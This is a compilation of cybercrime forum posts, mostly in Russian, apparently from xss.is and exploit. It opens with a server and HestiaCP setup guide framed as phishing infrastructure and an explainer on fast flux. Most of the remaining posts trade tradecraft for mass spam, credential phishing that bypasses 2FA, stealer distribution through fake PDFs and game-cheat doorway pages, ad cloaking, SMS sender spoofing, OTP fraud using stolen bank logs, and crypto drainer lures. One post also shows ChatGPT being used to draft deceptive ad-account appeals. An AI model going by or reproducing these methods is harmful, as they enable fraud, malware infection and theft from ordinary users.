Set the correct timezone and locale for your server.
bash
Copy code
sudo dpkg-reconfigure tzdata
sudo dpkg-reconfigure locales
7. Setup hostname:
Type this commandline below:
bash
copy code & paste
sudo -i
hostnamectl set-hostname node.xss.tld
to confirm if your hostname added to your server use this command below
$> hostname hit enter
8. Domain Configuration (Optional):
If you have a domain, configure DNS settings to point to your VPS IP address.
9. SSL/TLS Configuration (Optional):
If applicable, set up SSL/TLS certificates for secure connections.
10. Regular Backups:
Implement a backup strategy to protect your data.
11. Monitoring and Maintenance:
Set up monitoring tools and perform regular maintenance tasks.
After this Configuration update/upgrade you do not install whm. i don't use that. use this resource called hestia(dot)com, how to configure H-panel
Step 1-
Download the installation script for the latest release:
bash
copy code and pasge to terminal
$> wget <https://raw.githubusercontent.com/hestiacp/hestiacp/release/install/hst- install.sh>
If the download fails due to an SSL validation error, please be sure you've
installed the ca-certificate package on your system - you can do this with the
following command:
bash
copy code to your commandline:
$> apt-get update && apt-get install ca-certificates
Step 2: Run
To begin the installation process, simply run the script and follow the on-
screen prompts:
Bash
copy code to your terminal:
$> bash hst-install.sh
if you face error use this command
bash
copy code
$> bash hst-install.sh --force
#bash//->Beginners<-//
You need To Find BotBlocker "API-KEY" Sevices That support Phishing Pen tester, You need this service For Real Visitor validation To Mask Your Link AND Make Open Redirect BOT Bypass
*What Next?
If
You are a newbie Never try this without Basic Linux/security skills and
networking
skills
Let Talk About Fast Flux
What's Fast Flux??
Fast Flux is a technique used in the realm of cyber threats, particularly in the context of botnets and malicious activities. It involves rapidly changing the IP addresses associated with malicious domains or websites, making it challenging for security measures to keep up with and block these malicious entities effectively. Fast Flux is often employed by cybercriminals to hide the true location of their infrastructure and maintain the availability of malicious services.
Here's how Fast Flux typically works:
Dynamic IP Rotation: In a Fast Flux network, the IP addresses associated with malicious domains change rapidly. This rotation is often done at a high frequency, sometimes every few minutes or even seconds.
Use of Proxies and Compromised Hosts: Cybercriminals set up a network of compromised hosts or proxy servers to act as intermediaries between users and the malicious content. These intermediaries constantly change, making it difficult to trace back to the actual source.
Domain Fluxing: In addition to IP rotation, Fast Flux may also involve domain fluxing. This means rapidly changing the domain names associated with the malicious infrastructure. This can be achieved through techniques like domain generation algorithms (DGAs).
Persistence: Fast Flux allows malicious actors to maintain persistence and resilience against takedown attempts. Even if one IP address or domain is blocked, the network can quickly adapt and continue operations with new addresses and domains.
Obfuscation and Evasion: The primary goal of Fast Flux is to evade detection and mitigation efforts by security solutions. The constant changes in IP addresses and domains make it challenging for security systems to create effective blacklists or signatures.
Use
Cases:
Malware Distribution: Fast Flux is often associated with malware distribution
networks. Malicious content, such as phishing sites or malware download
servers, can be hosted using this technique.
Botnet Control: Fast Flux can be employed to control and manage botnets. The rapid rotation of IP addresses and domains makes it difficult for authorities to track and take down command and control (C&C) servers.
Phishing Campaigns: Cybercriminals may use Fast Flux to host phishing websites that collect sensitive information from users.
Countermeasures:
Behavioral Analysis: Security solutions often employ behavioral analysis to
detect patterns associated with Fast Flux activities.
Threat Intelligence: Utilizing threat intelligence feeds helps identify known malicious domains and IP addresses, even in a fast-changing environment.
Anomaly Detection: Detecting unusual patterns in network traffic, such as rapid IP or domain changes, can trigger alerts for further investigation.
DNS Monitoring: Monitoring DNS requests and responses for unusual or suspicious activities is crucial for identifying Fast Flux networks.
**For any help or Tutorial kind drop your comment 's **
Happy phishing and hacking xss.is Fam!!
Whoami
i am Snark, I am Professional IT security Freelance for Real Life!,
Darkside of me phishing the rich to feed the poor!
You need help for setting up professional spamming/ Cracking smtp.. or inbox
issue mailer..
Mail: Manjaro_GooFuzz@proto.me
Tele: @snarkfuzz
Сколько будут стоить несколько видео, где богатый рич мэн в дорогих часах сидит за компьютером где на экранах фейк биржа.
Hello everybody,
I've been a long time lurker here and I got interested in spamming, my main
goal is to be able to spam a stealer (this one to be precise: /threads/69584/)
and then... I don't really know, because i first have to get there
I was thinking about creating a fake pdf like this: /threads/74103/ (thanks
DoKitO
).
I've been lurking on forums for a while and managed to find most of the
software I think I need, the reason why I made this post was because I am
looking for other resources that I've probably missed or that I completely
lost, I remember lots of templates for emails that I forgot to save
.
there are lots of video guides but unfortunately those are all in russian and
I can't speak it nor understand it.
I have some other questions too:
I have lots of things on my mind right now and I probably forgot some more things i wanted to say, if anyone is willing to share some knowledge I would be very grateful. anything is good, especially other threads on this forum or on other forums, I;m trying to gather the most information possible.
thank you all, sorry if I might sound very inexperienced but that's because I am. And sorry for the russian speakers, I'll try to translate the thread but the translator might not do a good job at translating decently, your answers are still very much welcome!
Russian:
Привет всем,
Я долгое время был здесь завсегдатаем и заинтересовался спамом, моя главная цель - уметь спамить воровство (точнее, этот: /threads/69584/), а потом... Я не знаю, потому что сначала я должен туда попасть Я думал о том, чтобы создать фальшивый pdf вроде этого: /threads/74103/ (спасибо DoKitO ).
Я засиживался на форумах некоторое время и смог найти большую часть программного обеспечения, которое, как я думаю, мне нужно, причина, почему я сделал этот пост, потому что я ищу другие ресурсы, которые я, вероятно, пропустил или которые я полностью потерял, я помню много шаблонов для электронной почты, которые я забыл сохранить .
Есть много видео-руководств, но, к сожалению, все они на русском языке, а я не могу ни говорить на нем, ни понимать его.
У меня также есть несколько других вопросов:
У меня сейчас много всего на уме, и я, вероятно, забыл еще кое-что, что хотел сказать, если кто-то готов поделиться знаниями, я буду очень благодарен. Все, что угодно, особенно другие темы на этом форуме или на других форумах, я пытаюсь собрать как можно больше информации.
Спасибо всем, извините, если я могу показаться очень неопытным, но это потому, что я такой и есть. И извините для русскоговорящих, я попытаюсь перевести тему, но переводчик может не справиться с работой, чтобы перевести достойно, ваши ответы все равно очень приветствуются!
I have 400 accounts office365 do i need 400 proxies also to sent them
properly?
i tried to send them all with my ip address but some emails i test didnt
receive maybe office365 detected it sending 1 ip of 400 accounts.
where i can find a proxy mailing seems hard to find most are dead when i try
to sent them.
any solutions for this problem thanks
Подкиньте интересные мануалы по ютуб трафику, продвижению, как не попасть в бан и т.д.
Привет всем
Ребят кому не трудно скиньте софт для рассылки по почтам (крякнутый)
Ищу дней 5 уже что нибудь нормальное, но пока только трояны
Заранее спасибо
Всех приветствую. В теме трафика я полный ноль, полный ноль имеется ввиду в практике, никогда не добывал трафик. Есть вопрос, какие сейчас актуальные методы трафика есть? Если кто то может то пожалуйста, расскажите об этом поверхностно. Сейчас собираюсь для себя делать софт для добычи трафика из телеграма и лить его на свои же проект в телеге, в софт будет встроена нейронка (OpenAI), хотелось бы послушать методы трафика, может быть у кого то есть совсем экзотические методы? Всем спасибо.
Всем привет, сделал автоматизированный Gmail фишинг (на разработку ушло 2
месяца) . Эмулирует устройство,айпи владельца и тд. Конверсия и вероятность
подтверждения 2фа очень высокие . Ищу людей у которых есть идеи как лить
траффик на него . На самом деле подойдёт почти любой траффик, нужно просто
добавить авторизацию через гугл на сайте .
Связь тг - @drugh5
Ищу спам ЮСА имейл, в пм с предложениями. Спасибо.
Можете подсказать с чего лучше слать в инбокс в офис 365
Какие смтп использовать лучше? Какой ip отправителя?
Возможные нюансы.
Готов заплатить за информацию.
Готов поделится опытом, пишите в pm.
добрый день/вечер всем,
хотел бы узнать у знатоков насчет рекламы для беттинг и гэмблинг, сложно ли
этим заняться если есть уже "клиент"?, много ли там ньюансов? как лучше всего
научиться этому как можно быстрее? есть ли какие-то мануалы, по которым можно
поработать и которые являются актуальными, я знаю что лучше всего обучаться у
ментора, который подскажет как лучше и тд если есть ли кто-то кто готов был бы
научить этому за копейку, я бы с удовольствием принял бы его в качестве
ментора, я прям новый в данной сфере.
сам имею немалый опыт с вирусами и СЭ, готов на обмен знаний))
по рекламе всегда находил ребят, которые готовы были залить трафа, а теперь
решил сам узнать про это поподробнее, буду признателен за грамотные ответы,
без воды и тд
всем спасибо)
Господа, рад вас приветствовать в треде.
Здесь, мы с вами подытожим весь накопленный мною опыт внутри форума exploit.
Этот топик, будет эпилогом всех предыдущий частей, с некоторыми поправками.
Чтобы бы не нарушать хронологию концепта, встроим данный тред в общее
повествование следующим образом:
White SEO [ Для чайников ] - Gray SEO
[ Для чайников ] - Black SEO [ Не для
чайников] - Black SEO [ Накрутка ПФ ]
А теперь давайте выделим основные моменты, которые стоит обсудить заранее
1. Black SEO - что это?
Гуглим вики, получаем +- следующее описание
Black SEO - это термин из поисковой оптимизации. Это относится к методам, которые нарушают рекомендации поисковых систем по качеству. Это включает, помимо прочего, автоматическую генерацию текстов и проникновение в сторонние системы для установки обратных ссылок.
Click to expand...
Посмотрим, что там пишут на сайтах
Чёрное SEO — это оптимизация сайтов с помощью запрещенных методов.
Позволяет быстро поднять позиции ресурса в поиске, но повышает риск блокировки и бана со стороны поисковых алгоритмов.Click to expand...
2. В чем ключевое различи метдологий white/black?
Чтобы осознать разницу, нужно понимать цель
Главная цель чёрного SEO — это обман алгоритмов поисковых систем и
получение высокого ранжирования и трафика. ( с )
-мне не очень нравится это описание, я думаю, что корректней сказать так
Главная цель чёрного SEO — это манипулирование основными факторами
ранжирования поисковых систем для получения трафика в краткосрочной
перспективе
Основной целью белого SEO - это создание качественного и ценного контента
для пользователей, а также улучшение пользовательского опыта на веб-сайте. (
с )
Думаю разница очевидна, как следствие мы будем смотреть на предыдущий
материал в рамках цикла статей о SEO - сквозь пальцы.
Исключение: Black SEO - [ Накрутка пф ]
**И да, далее мы будем говорить о технологиях которые помогают влиять на основные факторы ранжирования.
Содержание: **
Part I [ Введение в black SEO ]
[Part II [ Реализация стратегий в black SEO ]](https://devby.io/news/hacker-
from-rechitsa)
__
Part III [ Доры ]
Фармим своего домашнего вебкраулера гугла в промышленных масштабах
__
Part III [ Генерация Контента ]
Part IV [ Ссылочное продвижение ]
Part V [ Накрутка поведенческих факторов ]
Это может быть глупый вопрос новичка, но реально ли провести DDoS-атаку на сеть Tor, что-то, что проходит через мосты или что-то в этом роде?
фишка года a.k.a подмена домена для бедных.
При создании объявления есть функция " Название компании":
Доступна она исключительно в верифицированных рекламных аккаунтах (фармы verified google ads, к слову, стоят не очень дорого, по крайней мере у меня в боте)
Суть функции: Позволяет написать над объявлением имя рекламируемой
компании:
Если в обычной РК в этой строке всегда отображается целевой домен, как
показано на скрине сверху, то с _verifyed google ads аккаунтов можно написать
ЛЮБОЙ ТЕКСТ, к примеру, название сайта:
или, ВНИМАНИЕ, оригинальный ДОМЕН официального сайта:
Делать это нужно, естественно, через тот самый юникод (предыдущая
статья) , иначе, вероятно (99,9%), объявление не пройдёт модерацию. В
редакторе выглядит это так:
_
ДУМАЙТЕ.
Подскажите хорошие чекеры мейлпаса платные\бесплатные?
Hello what is the best free Mailer to Spam?
very thanks ?
Товарищи спаммеры, какими вы пользуйтесь сервисами для валидации своих баз на
подобие Mailgun и DeBounce ?
И работают ли они корректно с бигами в отличии от каких-то частных
сервисов/ботов с форумов?
Сразу прошу прощения, если не там создал тему.
Не могу подвязать карту в гугл клауд, чтобы клауд дал триал на использование
сервиса. Использовал виртуальные/физ карты с балансом. Менял прокси. На
основном аккаунте с моей физ картой такая же история. При томбез проблем**
создаются платежные профили гугл и подвязываются карты на аккаунтах.
Тому кто поможет решить проблему, я выражу свою благодарность символической
суммой в 100$.
Ответ саппорта на последнем скрине.
**
Не особо понимаю почему при выставлении бюджета в 100/дейли он крутит как ебучая улитка по 0.01 центу в час, бюджет менял и выше и ниже, объясните как это работает пожалуйста, с ценой за конверсию тоже игрался. Буду благодарен за ответ по поводу того как это пофиксить и отлить с нормальным скрутом бюджета
Всем привет!
Моему товарищу нужен телеграм бот, который бы проходился спамом (рассылками)
по тематическим телеграм чатам под его онлайн-магазин. Нужен полностью
самописный, с гибким функционалом бот. Буду очень признателен если направите
на нужные ресурсы/людей. Всем добра.
Всем привет!
Подскажите бесплатный SMTP Spammer на подобии Ultimate mailer,за ранее
благодарен
Как добывать трафик в рунете бесплатно в 2021 году?
Всем привет ,где купить хорошие прокси(ip:port) для чека smtp и спама?
Нужны прокси которые хорошо подключаются к smtp по типу biglobe.ne.jp
Буду очень признателен за подсказку
this is a 2022 tutorial i found that teaches you how to build a call center with twilio vertification webhooks etc hopefully you guys find it helpful TAKE A SECOND TO REACT ILL TAKE HALF A SEC TO SHOOT YOU PASSWORD
twilio call center.zip - 995.2 MB
TWILIO2.zip - 955.5 MB
TWILIO 3.zip - 487.0 MB
Almost any country.
If you have bank logs ,cvv etc with name and phone number we can work together.For some
We offer sms OTP, 2FA service foe almost all countries and some more
Waiting contacts in PM
Всем привет, посоветуйте плиз один момент, есть куча ботов пустышек с ФБ и Гугл акками, тащить куки не вижу смысла там фактически никто не залогинен через браузер, все юзают аппы, так вот имеет ли смысл ставить инжекты на гугл
П.С. может у кого-то случайно завалялись инжекты от фб/гмайл на андроид?
раньше можно было без телефона зарегистрироваться, а сейчас не получается.
может есть обходные пути?
или посоветуйте мыло без телефона, спасибо
Ищу команду кому нужен трафик на чёрные темы ( Банки ) у меня есть опыт работы
с гуглом скручиваю весь кредитный лимит за пару часов жду предложение в телегу
https://t.me/basellerx
От вас мат + клоака
Интересует вопрос по поводу стиллеров, каким образом добываются логи?
Спасибо
Всем добрый день.
Ищу человека кто может за вознаграждение прояснить непонятные моменты по
трафику. Половина работы проделана, есть сложности по EV Signing сертификатам
и тд. От Вас 1-2 часа ответов на вопросы в ТГ. По цене договоримся, пишите в
ПМ.
Вопросы из серии:
1. Как увеличить жизнь доменам, если клоака уже стоит?
2. Как обойти гугл алерты без ев серта?
3. Как обойти смарт без ев серта?
4. Нужен ли лоадер?
5. Да и вообще по теме получения логов с гугла (именно технические задачи)
Читал очень много инфы как с него проливаются, и видел мануалы по гпей + но
адс, когда дошло дело к практике у меня не подтягивается карта в адс.
Может кто подкинуть информации или советов по этому?
Заранее благодарен
Всем привет! Последний раз email рассылками я занимался в 2017 году. Насколько я понял, с тех пор всё сильно изменилось, и, по сравнению с тем, что было раньше, запускать рассылки стало немного сложнее. В 2017 году у меня был приватный софт, и я делал рассылки с доменов, которыми даже не обладал. Я мог использовать любое доменное имя, так как для такой рассылки использовался определённый протокол. Я просто брал домен оффера и рассылал письма с него. Что-то доходило до получателей, что-то попадало в спам, но даже с такими ресурсами удавалось получать хорошую прибыль.
Сейчас я ознакомился с материалами и курсами последних лет, которые нашёл на форумах, и хочу вернуться в email рассылки. У меня появилось несколько вопросов, и я хотел бы задать их вам (более опытным спамерам).
Я хотел бы узнать, какой софт и в каких случаях лучше всего использовать. Среди спамеров СНГ чаще всего слышал о AMS Enterprise, ZennoPoster и Bluepony (приват софт), в то время как зарубежные спамеры часто упоминают MailWizz + PMTA и похожие связки. Также хотелось бы узнать, что лучше использовать для рассылки и как это влияет на результат: покупные gmail аккаунты, почты доноров, свои SMTP или покупные SMTP (Amazon и т.д.).
Буду благодарен за любую информацию. Спасибо!
Есть VPS украина на нем все настроено прибит домен .ru
Прописаны все возможные запись на mail-test.com 10 из 10 показывает .
При отправки писем на gmail через mailwizz при подключение smtp письмо летит в
спам.
Помогите понять что не так.
Церт Lets
Буду благодарен за любою помощь, хотя бы дать направление куда не туда смотрю.
Мысль одна может зона .ru не пробивается (
У меня есть сервак, занимаюсь его настройкой, использую его как vpn. Очень надоела реклама, может кто покидать гайдов на тему блокировки рекламы через сервер.
Всех приветствую, такой вопрос. Я новичок в спам рассылках, сейчас хочу создать свой smtp, и столкнулся с вопросом при покупке домена, есть ли разница домен .ru или .com?И влияет ли это вообще на гео рассылки? Заранее спасибо за ответ
Здравствуйте уважаемые форумчане. Загнал меня в тупик этот гугл да и знаний не
хватает для его обхода. Подскажите имеется сетка сайтов под поисковики (СЕО).
Последние 3 месяца что то гугл начал меня сильно блочить, ставит конкретно на
любую ссылку на главной КТ (использовались и дискорд и гитхаб и др).
По моим тестам я заметил что проверяется после перезалива файла сразу же
спустя 1-2 часа. Сайт проверяли и его хтмл он чистый. Как можно обойти гугл
алерт может кто то по рекомендует. Пробовал ставить сертификат на файл +
лоадер, всё равно блочит, как я понимаю ставит он алерт после проверки самого
файла на вирусы, потому как в отстуке вижу сервера их.
Заметил что конкретно ставит алерт на один софт, т.к на сайте размещены другие
софты во внутренних страницах он их вообще не трогает.
Какой из мануалов написать, что бы было полезно новичкам.
Покупка Аккаунтов. Нужно или нет?
Всех приветствую друзья. Сегодня разберём тему покупных аккаунтов, так как вижу, что даже самые опытные обжигаются на этом, что уж говорить о новичках. Постараюсь разложить по полочкам
Сразу, что вы должны понять, на аккаунтах система читает определенные индексации, связанные с клоакингом, фишингом, пейментом и тд. На основе этого, вы получаете бан или же запуск.
1. Аккаунты после Разбана. Уже практически год, как на этом поднимаются
мамкины бизнесмены, однако данный тип аккаунтов давно пофиксили и траст в разы
ниже любых нулевых саморегов.
- повышенный фрод за клоакинг и фишинг
- "метка" на аккаунте. Модераторы частично утратили свою силу перед
автосистемой, и даже если они выдадут разбан, это не значит что система его
повторно не накинет при первом запуске
- лимиты на открут. Они выставляются как системой, так и модератором
- цена. За данное "счастье" в виде геморроя, вас попытаются нагреть на
50-150$ за штуку
2. Фарм аккаунты без платежного профиля
Этот тип аккаунтов славится обилием банов за Подозрительные платежи. Всё дело в том, что они фармят почты, куки, ресурсы, но гуглу на них глубоко плевать, если у вас нулевой платежный профиль. Что собственно и происходит когда вы идете в эдс. Создаете сами платегу, карту линкуете и получаете бан. Для гугла вы 0
3. Аккаунты с прогревом до 7 дней эдса.
Никогда такие не покупайте, если не будете запускаться плейсмент в плейсмент. То есть греют на ютуб и вы так же запустите ютуб. Юак, соответственно юак и тд. Основная проблема в том, что если вам нужен поиск, а вы купите фарм ютуба, вы легко можете получить бан от системы с пометкой "Аккаунт создан с дальнейшей целью мошенничества". Это уже сформированный паттерн и реагирование на него идет автоматическое
Все остальные типы акков в основном идут в различных вариациях и ответвлениях от этих основых. Мой совет здесь простой - делайте свой мат, понимайте под что он подходит и как с ним работать. Без этого, тыкая пальцем в небо, стабильности не получится
I am looking for partner who can provide traffic to my fakes.
i have ready to go plans to make money instantly.
targeted country: FRANCE.
Huge amount of $$
msg me on telegram at @mr_zxxx
Ребят всем привет а можете поделится кому не сложно жива ли рассылка сейчас
как и что шлете ?
мы вот месяц пытаемся рассылать и кроме пентестеров ничего не приходит
раньше* было такое что 10-15 доменов хороших было
рекорд 100 доменных машин за рассылку
а сейчас как то уже не идет
может есть кто может подсказать рабочая ли еще эта тема
у кого какие результаты и тд
p.s. раньше имеется ввиду ноябрь, декабрь 2020, тоесть до нового года
В ходе работы по email рассылке возникло ряд вопросов, на которые пока что не
нашел ответ, понятно, что нужно пробовать самому, но вопросы обобщенные
1. Не смотря что все зависит от базы, какой обычный % перехода/конверсий при
попадании в спам, а не в инбокс и какой при попадании в инбокс?
2. Есть ли примерный лимит отправки писем с одних и тех же релеев до
попадания в спам? Лучше ли отправить по 10к писем, с попаданием условно 50% в
инбокс или сразу 100к но в спам?
3. Лучше 30 доменов с редиректом и низким трастом или 1 домен с высоким
трастом?
4. Лучше лендинг страницы или просто редирект?
5. Какое нормальное кол-во релеев для отправки 100к писем?
6. Какая может быть причина того, что было удачно отправлено более 150к
писем, даже если учесть, что они все попали в спам, выхлоп +-0, хотя база
целевая?
7. Почему письма попадают в спам, если используется несколько шаблонов с
большим количеством рандомизации (практически на каждое слово 10 синонимов)
кол-во smtp около 5к?
Как сделать хорошую скачку со своим доменом чтоб была короткая ссылка и возможность отслеживать трафик
Курс, на котором автор разбирает ошибки и подводные камни и способы заработка. Курс состоит из 7 модулей.
Структура курса:
• Как заработать на YouTube?
• Контент-стратегии для канала
• Какое создавать видео
• Настройка канала
• Оформление и загрузка видео
• Бесплатный трафик и подписчики
Продажник недоступен
Курс: https://cloud.mail.ru/public/3j7m/4JowGGurA/
Hello everyone!
I am looking for an smtp friendly vps service provider where I can order a vps
with at least 20 additional ip addresses.
Thanks!
Нужно ежедневно рассылать в ручную примерно по 15-20 писем. Эмейлы получателей
разные - gmail, yahoo, other, каждый день разные получатели.
В письме текст, одна ссылка чистая и всё. Подскажите как лучше подготовить
почту, дабы залетало всё в инбокс.
Что лучше выбрать - гмаил? Какие прокси использовать и у какого селлера лучше их брать? Работаю через сферу.
Заранее спасибо.
Дорогие друзья придумал как делать инсталлы с поисково траффика, посмотрите на
выдачу google по запросу "among us generator hack","roblox free robux
generator",brawl stars generator hack".
Дорвеи на первых страницах, доры ведут на разные лединги, вместо ледингов
выдаем attach с Google Диск или Google облако, уже не помню, где прямая
ссылка, сам exe файл паролим rar.
Создаем файл pdf с нашей ссылкой, а сам pdf файл можно заказать пролив файла
по шеллам, желательно трастовым и отправить адреса наших страниц с pdf на
индексацию в google, тут на ссылки в соцсетях быстро придет google bot, ну или
кто может знает лучше способ .
Запросы можно читы делать то что нужно и оправдывает по чему архив запаролен,
чтобы google не забанил.
Можно и инсталлы под android так делать, но надо тогда фильтровать user agent
google bot, запросы под android дорвеи делать и наверно автокрипт если объемы
будут.
Это друзья чисто идея делюсь с вами мыслями, но думаю срезонирует.
Всем привет, форумчане!
Хотел бы узнать побольше об инсталлах. Кто может нормально объяснить что это такое? Также, хотел бы узнать у кого можно их приобрести и как с ними работать.
Всем привет,
Я спамлю на мэйлы, мне надоела покупать мэйл листы у продавца.
Какие софты использовать чтоб их самому делать? И как их делать? Я слышал о sqli dumper он еще актуальный? У кого то видео обучение есть?
Всем привет, задался целью добывать себе материал со спама. Возможно и на
продажу тоже. Но я очень плохой технарь.ё
Фишинг под US банк. Нужна помощь в правильной установке, куда и как его
поставить что бы гугл через минуту не ругался что "
З.Ы. Так же ищу любое партнерство по спаму.
Связь тг: https://t.me/selena147
big crypto be made, over 50btc made already in less 1month
telegram = zxcvvnmo
wickr: pm for
jabber: robertt@5222.de
--------------------------------
Ищем надежных партнеров во всех областях знаний, доступа к почте, фишинга, спама, 0day для доступа к определенному домену. Я ищу по всему миру.
большой объем криптовалюты, более 50 биткойн уже за 1 месяц
телеграмма = zxcvvnmo
wickr: pm для
jabber: robertt@5222.de
Salut
отдать честь
всем привет, подскажите сервис. нужно именно физические карты.
Заинтересовал данный курс /threads/88805/ но в связи с тем что его автор
сейчас находится в длительном отпуске, не предоставляется возможность купить
его напрямую
Может ли кто-нибудь поделиться данным материалом, за $ или просто как жест
доброй воли?
Всем спасибо
Всем привет. Имеется опыт получения инсталлов на трафике с Google Ads, тут все
достаточно банально, мы имеем целевой трафик и аудиторию, которой нужен
конкретный софт.
Со спамом же все не так однозначно для новичка, по-этому прошу помочь
определиться с вектором.
На мой дилетантский взгляд, отталкиваться нужно от имеющихся на рынке
предложений по обертке полезной нагрузки и от этого уже подбирать тематику
базы под спам и саму разводку.
Просьба тыкнуть в линк здесь на форуме если уже обсуждалось, также готов к обмену опытом с владеющими информацией или хотябы паблик идеями, которые можно взять за основу.
Всем привет! В последнее время на смену криптофишам пришел драйнер. Многие пишут статьи о залива траффика c Twitter, но источник уже действительно мертв. Для пролива с твитер нужно большое количество аккаунтов - которых не достать особо. Плюс ко всему пользователи твитера уже знают, что за собой скрывает ссылка на аирдроп )))
Так вот - мой способ довольно стар, но все еще работает. Сегодня я опишу процесс залива с YouTube. Мной был выбран довольно паблик оффер "Pankake Swap Bot"
Сделали довольно простой лендос https://pancakesniper-bot.com/ (Демо)
Следующим этапом заказали видео такого формата:
Теперь самый ключевой вариант как туда гнать траффик, многие уже подумали про сео теги и тд - но НЕТ! Довольно не плохо себя показывают SHORTS. Делаем еще одно простое видео, где будет призыв к просмотру нашего фулла который мы залили на канал. Для шортсов хорошо подходят каналы USA на которых есть хотя бы 50-100 подписчиков. Ценник на такие каналы около 2 баксов. Покупаем такие каналы - далее используем софт для автозалива и готово )) Способ довольно простой, но почему - то все до сих пор сидят на СЕО и твиттере. Как по мне это куда дешевле - проще - быстрее. Ценник на автозалив тоже довольно демократичный.
Не знаю на сколько это можно назвать полноценной статьей, но общую суть я постарался передать. За помощью или по вопросам можете обращаться в мой телеграмм - Savage_Logs
I need a way to use keywords and not be suspended. Paying well for help.
Hello. We are looking for a partner that will generate traffic for a private android bot. Job on%. There are very good cashout methods for a given geo. We will arrange everything after the initial conversation by pm.
У меня такой вопрос, сколько можно максимально набить трафика(примерно) с
переходом на страницу где нужно просто оставить емаил?(ничего скачивать не
нужно)
Или может есть более эфективные сопсобы загнать траф на подобную страницу?
P.S. знаю что все зависит от тематики и от уровня обьявы итд(может мой вопрос окажется не корректным), но все же может есть какое то среднее значение.
Всем привет. Столкнулся с проблемой использования SMTP Office 365 в AMS
Enterprise (Crack 2.99.11)При попытке проверить SMTP Получаю такую ошибку в
лог
Настройки подключения выставил по автомату,но пробовал уже все возможные
вариации
Примитивный SMTP чеккер на Python И EpochtaMailer отлично отправляют тестовое письмо в инбокс,но AMS срёт ошибками,не могу понять в чём дело.
Всех приветсвую, возник вопросы буду благодарен за помощь:
Например имею 10к смтп акков почтовика валид и чекнуты на отправку, вопрос к
проксям сколько их нужно для отправки скажем 500к писем? Какие прокси подходят
для такого рода рассылок? Например пакетный тариф какой нибудь шаред ipv4 1к
прокси подойдет на такой объем? Нужен ли на проксях 25 порт? Тестил на
закрытом 25 и 465 портах вроде доходит до инбокса но все же кто точно знает
буду благодарен за помощь.
Готовлю статью - схему про мотивированный трафик и один из способов его реализации. Доход не супер большой, больше для старта я бы так сказал. На хлеб с маслом хватит)
Привет, ребята. Кто-нибудь знает, правда ли этот сайт?
Hi guys. Does anyone know, is this site legit?
Bitcoin Doubler ](https://doublebitcoin.github.io/)
Send bitcoin to yourself and your bitcoin will be doubled. Our servers block transactions for 10 minutes until you send bitcoin to yourself. Double your bitcoin
doublebitcoin.github.io
Hello everyone ,
i'm looking into setting up my own SMPP server with custom id since other
providers are getting more and more expensive ; usual providers like
Twilio/etc... blacklist very quickly
If anybody has any experience with this particular issue please share your
experience or PM.
thanks in advance
Уже не раз слышал про то что щас спамят по чатам в WhatsApp
Можете объяснить - что они делают и зачем
Всем привет,повестка сегодняшнего дня такая - насколько сейчас актуальны биржи инсталлов?
По каким соц.сеткам в США и Европе можно сейчас "легко" спамить? Т.е. на которых нет "капч" и можно отправлять простые post/get-запросы?
How folks, I write to ask this question to help stop arguments.
Does silent doc exploit exists?
[ENG]Hey I have done a lot of research on URL spoofing and tested a lot.
The method with Google ads 360 doesn't work for me and with the 402 redirect, neither. Does anyone know how the method works? I would be very grateful for a short explanation.
Example
You can also DM or contact me here: https://t.me/Officiallifetimecharger
Best regards
[RU]
Я провел много исследований по подмене URL и много тестировал.
Метод с Google ads 360 у меня не работает и с 402 редиректом тоже. Кто-нибудь знает, как работает этот метод? Буду очень благодарен за краткое объяснение.
Пример
Вы также можете связаться со мной по DM или здесь: https://t.me/Officiallifetimecharger.
С наилучшими пожеланиями
Ищу сервисы / услугу отправки СМС (SMS gateway) с подменой sender id, с
возможностью добавлять ссылки в смс.
Кто может написать или у кого есть уже готовые скрипты рассылки с высокой
проходимостью, куплю ваши решения реализации / сервисы.
Важна доходимость всех сообщений. +- 500 смс в неделю.
Looking for reliable DE SMS Gateway, with sender id spoofing + link in sms.
Прошу писать в пм, спасибо.
Неважно, идёт ли речь о телеграм-канале/сайте либо ином проекте, какие стратегии будут наиболее эффективными?
Если более конкретно, есть проект в телеграм-канале на дарк-тему, и ищу эффективные способы его продвижения. Таргетинг, как понимаю, не подходит, так как могут забанить и он не совсем анонимен. Остаётся реклама в тг-каналах или спам в ТГ, либо, как вариант, еще какие-то пиар-акции в реале или через сайт. Какие ещё методы можно использовать, чтобы получить максимальный результат?
Почему таргетинг не подходит кмк? Потому что его легко заблокировать. Кроме того, многие сервисы проверяют контент, который продвигаешь, а нам нужно оставаться анонимными. Поэтому как понимаю это не подходит.
Как добиться результата? Как привлечь людей к сотрудничеству и обратной связи? Каков бюджет тут и стратегии продвижения?
Любопытно, как осуществлялось продвижение подобных проектов? Какие стратегии применялись, какой объём финансовых ресурсов был задействован? Как обеспечить конфиденциальность и результативность продвижения? Как привлечь активных участников и мотивировать их к взаимодействию?
Здравствуйте
Меня интересует, как осуществляется процесс подделки электронной почты. Я бы хотел узнать, какие существуют сервисы или методы, позволяющие отправлять электронные письма, казалось бы, от чужого имени, да так, что бы получатель их не получал в разделе "Спам"
Пример в фото
Кто-нибудь знает такие сервисы, в основном накрутка инсталлов с google play? А нужен именно сервис для накрутки отзывов расширений.
В последнее время в мои личные сообщения поступает много разнообразных вопросов по теме слива трафика в Google Ads. В первую очередь хочу сказать, что я не являюсь гуру в этом вопросе, каждый день учусь и нахожу что-то новое для себя. Постараюсь давать на них ответы в виде вот таких мини-статей гайдов, отталкиваясь от своего опыта. Грубо говоря просто поделюсь своим подходом.
Давайте начнем с того, как я подаю много аппеляций, используя ChatGPT
Здесь ключевое понимание того, как к нему обращаться. Я составляю обращение от имени добросовестного предпринимателя, стремящегося развивать свой бизнес, но столкнувшимся с проблемой в виде первой блокировки аккаунта из-за подозрительных платежей.
Вот пример того какой запрос я ему даю:
Hi, I registered a google ads account to promote my flower delivery business, but for some unknown reason my account is blocked due to suspicious payments, is this some kind of mistake and I am willing to provide any required documents to confirm the legitimacy of my payment method, please help me to write an appeal based on the above.
Получаю вот такой ответ:
**I am writing to appeal the recent suspension of my Google Ads account related to the concern of suspicious payments. My account, associated with my flower delivery business, was unexpectedly blocked, and I am eager to provide any necessary documentation to verify the legitimacy of my payment method.
I can assure you that all payments made through my account are genuine and originate from a valid and legal source. I am more than willing to provide any requested documents or additional information that can confirm the authenticity of my payment method and resolve this issue promptly.
Here are the details of my account for your reference:**
To assist in resolving this matter swiftly and effectively, I am prepared to provide the following supporting documentation:
**Please review my account and the provided documentation to ensure compliance with your policies and guidelines. If there are specific concerns or additional information needed, I am more than happy to cooperate and provide any further details necessary to expedite the review process.
